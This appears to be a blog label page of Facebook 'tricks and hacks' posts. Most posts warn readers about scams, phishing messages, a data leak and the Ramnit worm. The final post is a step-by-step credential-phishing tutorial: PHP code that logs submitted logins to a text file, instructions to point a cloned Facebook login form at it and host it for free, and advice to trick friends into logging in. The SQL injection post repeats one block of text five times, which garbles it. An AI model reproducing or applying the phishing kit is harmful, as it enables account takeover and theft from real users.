Showing posts with label FACEBOOK TRIKS AND HACKS. Show all posts
Showing posts with label FACEBOOK TRIKS AND HACKS. Show all posts

Facebook Issue May Have Leaked Your Email and Phone Number

Jun 22, 2013 | comments

DYI ,FACEBOOK,Facebook DYI,Facebook data breach


Facebook just published a data breach notification on its security blog.
You might not immediately notice that from the title of the article, which announces itself as an "Important Message from Facebook's White Hat Program."
 The cloud (bad pun intended) is that Facebook's systems made the fault possible in the first place.

What Facebook seems to be admitting to, in Friday's breach notification message, is that it was careless with the aggregated data accumulated from contact list uploads.
The problem, says Facebook, lay in its Download Your Information (DYI) feature, which exists so you can suck down everything you've previously entrusted to the social networking giant.

 DYI improves availability, because it allows you to make your own off-site backup of everything you've stored on Facebook. It improves transparency, because it acts as a record of everything you've uploaded to Facebook over the years.But there was a bug in DYI, of the data leakage/unauthorised disclosure sort.
Apparently, DYI was capable of letting you download more than you'd uploaded in the first place.




 

“First 300 Shares Will Get Prize” Facebook Scam

Nov 21, 2012 | comments

Various messages distributed on Facebook claim that users can win expensive prizes such as Apple products or designer headphones just by liking and sharing a Facebook Page
  
These posts used by fraudsters to advertise their Facebook pages and, in some cases, even utilized to trick unsuspecting customers into handing over personal information .

FOR EXAMPLE :


“FIRST 300 SHARE WILL GET THE SAMSUNG GALAXY-When It’s done send me all your informations inbox.”

“FIRST 300 SHARE WILL GET THE IPHONE 5-When It’s done send me all your informations inbox.”

“THIS IS NOT A JOKE! I’M GIVING AWAY THOSE I-PADS I-POD IPHONES APPLES, FOR THE LUCKY 50 PEOPLE THAT ‘SHARE’ THIS STATUS, COMMENT ‘DONE’, AFTER YOU LIKED IT. GOOD LUCK I’LL PICK THE LUCKY 05 WINNERS.”


For example, one of the posts mentioned above promises 300 smartphones for the first 300 users that share it. Why would a company hand out 300 expensive devices for only 300 Shares or Likes.
Finally, as Hoax Slayer’s Brett Christensen highlights, these scammy contests are poorly worded and they’re usually written in uppercase letters. A legitimate company would never organize any promotion in such haste.

So, don't give these unscrupulous people what they want! Don't "like" their bogus Pages. Don't be tricked into spamming your friends with their fake promotions by sharing their pictures. Do not send your personal information to these people in the vain hope of winning a prize. Before entering any type of promotion or prize draw always take a closer look. If it seems suspect or dodgy, give it a miss. 

Facebook SQL Injection Vulnerability Found

Nov 1, 2012 | comments

Facebook SQL Injection
A few weeks ago a facebook 0-Day vulnerability was found on m.fbjs.facebook.com  that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter .

A few weeks ago a facebook 0-Day vulnerability was found that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter and was tweeted by Uroborox.
According to him the vulnerability is on m.fbjs.facebook.com

FOLLOW TheHackersblog

He said that the the vulnerability has laid 47 tables which are still working.

Read more: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#ixzz2DR2ReBC1
Follow us: @TheHackersBlog on Twitter | TheHackersBlog on Facebook

- See more at: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#axzz2DR2G1or6
A few weeks ago a facebook 0-Day vulnerability was found that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter and was tweeted by Uroborox.
According to him the vulnerability is on m.fbjs.facebook.com

FOLLOW TheHackersblog

He said that the the vulnerability has laid 47 tables which are still working.

Read more: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#ixzz2DR2ReBC1
Follow us: @TheHackersBlog on Twitter | TheHackersBlog on Facebook

- See more at: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#axzz2DR2G1or6
A few weeks ago a facebook 0-Day vulnerability was found that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter and was tweeted by Uroborox.
According to him the vulnerability is on m.fbjs.facebook.com

FOLLOW TheHackersblog

He said that the the vulnerability has laid 47 tables which are still working.

Read more: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#ixzz2DR2ReBC1
Follow us: @TheHackersBlog on Twitter | TheHackersBlog on Facebook

- See more at: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#axzz2DR2G1or6
A few weeks ago a facebook 0-Day vulnerability was found that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter and was tweeted by Uroborox.
According to him the vulnerability is on m.fbjs.facebook.com

FOLLOW TheHackersblog

He said that the the vulnerability has laid 47 tables which are still working.

Read more: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#ixzz2DR2ReBC1
Follow us: @TheHackersBlog on Twitter | TheHackersBlog on Facebook

- See more at: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#axzz2DR2G1or6
A few weeks ago a facebook 0-Day vulnerability was found that laid anyone to login to anybody's profile without a password. This vulnerability was found on the email updates of facebook which using google [Dorks] shown million of facebook accounts, which can be logged without any Password.

This Time Facebook subdomain found vulnerability to SQL injection. we were informed about this attack on twitter and was tweeted by Uroborox.
According to him the vulnerability is on m.fbjs.facebook.com

FOLLOW TheHackersblog

He said that the the vulnerability has laid 47 tables which are still working.

Read more: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#ixzz2DR2ReBC1
Follow us: @TheHackersBlog on Twitter | TheHackersBlog on Facebook

- See more at: http://www.thehackersblog.com/2012/11/vulnerability-on-facebook-found-sql.html#axzz2DR2G1or6

Latest News

Jan 14, 2012 | comments

         New Facebook Security Phishing Attack


There is a new Facebook phishing attack going on. It will not just try to steal your Facebook credentials; it will also try to steal credit card information and other important information such as security questions.

HOW IT WORKS :
This Facebook phishing attack is pretty interesting because it does not just try to trick the victim into visiting a phishing website. It will reuse the stolen information and login to the compromised account and change both profile picture and name. The profile picture will be changed to the Facebook logo and the name will be translated to “Facebook Security” but containing special ascii characters replacing letters such as “a” “k” “S” and “t”.
Once an account is compromised it will also send out a message to all contacts of the compromised account. The message looks like this:
Message Contains :
"Last Warning: Your Facebook account will be turned off Because someone has reported you. Please do re-confirm your account security by: => http://apps-xxxx-xxxxx-user.de.vuThank you. The Facebook Team"/

When you click on the link you will be redirected to a website which looks very similar to Facebook, and asks you for personal information such as: Name, Email, Password, Webmail system, Password to email etc. When submitting this form the details will be sent to the attacker, and they can automatically login to your Facebook account and compromise it.



CONCLUSION :

These scams are just getting more popular and we really recommend not giving out personal information, especially not email, password and credit card information over social medias. It is also recommend that you contact your security vendor and the social media vendor if you encounter these sites.

Turn Facebook Pink, Red or Black : Facebook Makeover Scam

Jan 13, 2012 | comments


Have your Facebook friends invited you to switch your boring blue Facebook profile to an attractive shade of red, black or shocking pink? The latest survey scam doing the rounds on Facebook works by falsely offering to change the profile of prospective marks from blue to red, black or shocking pink.

Many users must have seen similar messages to the following:

Switch to Pink Facebook (Limited Time!)

[LINK]

Say goodbye to the boring blue profile and say hello to the pink profile!!


OR

Switch to Red Facebook (Limited Time!)

[LINK]

Say goodbye to the boring blue profile and say hello to the red profile!!

what happens if you click on one of these links :

Firstly, you are told to share the link with your online friends. This should be the first indication that something is amiss - after all, what legitimate feature or organisation would require you to share news of it *before* you have actually experienced what - if anything - it can do for you?

Secondly, you are asked to leave a comment - extolling the wonderfulness of your new pink or red Facebook. Remember - at this point your Facebook is still decidedly blue. Any comment you leave will, of course, act as an endorsement and could be seen by your online friends and encourage them to also participate.

Predictably, the point of all of this sharing is to drive more traffic to the scammers' link where an online survey will pop-up. The more people who take the survey, the more commission that the scammers will earn.

That's not to say, of course, that it's impossible to turn your Facebook pink, red or black if you really want to Change your Facebook theme See this post (click here).

Clearly there's a demand for such customisation - even if it serves no practical purpose. But just make sure that your hunger for a pink-themed Facebook doesn't lead you into a scheme designed purely to earn money for scammers.

Facebook is rolling out Timeline as a "new" feature to replace traditional user profile pages. True to form, this feature has also become the target of survey scams over recent days .


WHAT TO DO : If you're one of the many people who fell for this or similar scams, please check your Facebook page to ensure that you are not spreading any messages to your online friends and ensure that you have revoked any Facebook applications, events and "like"d pages that you are uncomfortable with. If you use Facebook and want to get an early warning about the latest attacks, you should join the INDIATRIKS Facebook page .




Facebook Timeline Scam

Jan 10, 2012 | comments

BEWARE OF SCAMS RELATED TO FACEBOOK TIMELINE :

First it was the Cheesecake Factory; now, it’s Timeline. Facebook, like many other social networking companies, is experiencing some user dissatisfaction, and scammers are taking advantage of anti-Timeline sentiment. According to Insidefacebook, scammers are creating pages that assure the public that by “liking” the page, watching the linked video, downloading a certain browser application, or inviting their friends to the page, they will be allowed to opt out of Timeline.

These pages all ask readers to "Like" the account, and some even ask them to subscribe. Some pages ask readers to install a browser application; Google Chrome and Firefox are common targets of such scams. Though some Facebook pages may look harmless, remember that being cautious is the best way to prevent potential data loss.
Timeline was introduced by Mark Zuckerberg during the F8 developer conference. There, he announced that the beta version of the interface would be available to Facebook users on September 22nd.
So, what is Timeline? Facebook engineers implemented an algorithm that gathers all of your Facebook activity and organizes it based on what it deems important: your birth, high school graduation, first job, wedding, special events, and so on. The Timeline profile page is divided into two columns that contain recent photos, games, posts, and other activity. Since the algorithm decides what is relevant and what is not, there is a chance an event or a post you think is relevant might not show up in Timeline. But fear not, the new page layout will allow editing so that users can manually change what information is shared or deemed important.

Facebook employee Paul McDonald explains that Timeline allows users to add details of their lives before Facebook was created, providing an easy way to rediscover things once shared in real life. You have seven days to review and modify the timeline before it goes live and anyone else can see it.

As long as Facebook remains the top social networking site, scammers will use new and innovative methods to try to steal and exploit user information, but rest assured that ACE (Advanced Classification Engine) protects our customers from such scams.

Dammit Ramnit

Jan 8, 2012 | comments


A famous worm called Ramnit worm has been actively found in the facebook environment. It is reported by Symantec that this worm is responsible for the theft of more than 45k facebook passwords.
"We suspect that they use the Facebook logins to post on a victim's friends' wall links to malicious websites which download Ramnit," he added.Ramnit started as a file infector worm which steals FTP credentials and browser cookies, then added some financial-stealing capabilities, and now recently added Facebook worm capabilities.According to Cyberthreat management site Seculert, most of the stolen credentials were from US, UK and France, Furthermore they have added that over the of these stolen logins were invalid and many of them have reacted correctly by changing their username and passwords.

Ramnit first appeared in April 2010. By last July variants of the malware accounted for 17.3 per cent of all new malicious software infections, according to Symantec. A month later Trusteer reported that flavours of Ramnit were packing sophisticated banking login credential snaffling capabilities - technologies culled from the leak of the source code of the notorious ZeuS cybercrime toolkit at around the same time.

The new Ramnit configuration was able to bypass two-factor authentication and transaction-signing systems used by financial institutions to protect online banking sessions. The same technology might also be used to bypass two-factor authentication mechanisms in order to gain remote access to corporate networks, Seculert warns.We suspect that the attackers behind Ramnit are using the stolen credentials to expand the malware’s reach," Seculert concludes, adding that capturing the login credentials of Facebook accounts creates a means to attack more sensitive accounts that happen to use the same email address and password combination. "The cyber-criminals are also taking advantage of the fact that people usually use the same passwords for different web-based services (Facebook, Gmail, Corporate SSL VPN, Outlook Web Access, etc.) to gain remote access to corporate networks.


HOW TO PROTECT :- 1. Never click on strange links and report any suspicious activity you encounter on Facebook.

2. Update your Antivirus

How To Make Creative and Attractive Facebook Profile

Aug 19, 2011 | comments










A couple of month before a lot of facebook profiles picture appeared on the internet showcasing the creative use of new facebook profile . To make such creative profile is a difficult task and you need to have some knowledge of photoshop . But now you can do it easily without photoshopping .To have such profiles you need to have New Profile , if you dont already have then just go to facebook.com/about/profile/ .

Creative facebook profile

Now just go to ProfileGen.com and upload your picture . All profile images will be generated . Following the instructions and tag yourself in the image .




How to Change Facebook Theme

Aug 18, 2011 | comments


Social networking websites are used by many peoples, to make profile attractive we are in need for customizing by fonts, themes and etc. Facebook is one of the leading social networking website, but it naturally doesn’t allow users to customize their profiles.

Here is the solution or way to make your profile attractive with themes, backgrounds and more. One of the way is to install userstyles plugin to your browsers.

The plugin supported browsers are

  • Mozilla Firefox
  • Mozilla Thunderbird
  • Google Chrome
  • Opera

Some browsers may not allow these user scripts to be installed or supported.

Steps:

  1. Click this link userstyles.org
  2. You may see many plugins of various themes.
  3. Click the theme of your choice.
  4. Now on the right top click on “Install as User Script
  5. Now login to your Facebook, you may customized with themes.

Note:

These themes will only be visible if userstyles plugins are installed in the browsers.


hack facebook Account password Phishing method

Feb 16, 2011 | comments (1)

facebook hacking,facebook password hacking

We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don’t know about this method of hacking facebookFor this We need three files:

1.Fake facebook login page
2.Php file
3.Text file to store password

Create your php file

1.Open notepad and copy this code:

    header (‘Location: https://login.facebook.com/login.php’);
    $handle = fopen(“password.txt”, “a”);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    }
    fwrite($ handle, “\r\n”);
    fclose($handle) ;
    exit;
    ?>

2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create facebook fake login page

Now  go to http://www.facebook.com and right click / View Source.Copy source in notepad and save it as facebooklogin .html .Now open source code of this html file
We need to find the place where Login  code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code
action=anything.
In this case we have this

    action=”https://login.facebook.com/login.php?”

We replace that part with:

    action=”phishing.php”

Save your facebooklogin.html file

Text file

Create a blank text file and name it password.txt
Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use

http://www.justfree.com/

http://www.ripway.com/

also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

NOTE:-“Use this on your own responsibility for educational purpose only“
 
Support : INDIATRIKS
Copyright © 2011. INDIATRIKS - All Rights Reserved
Template Edited By Indiatriks
Proudly Powered By Blogger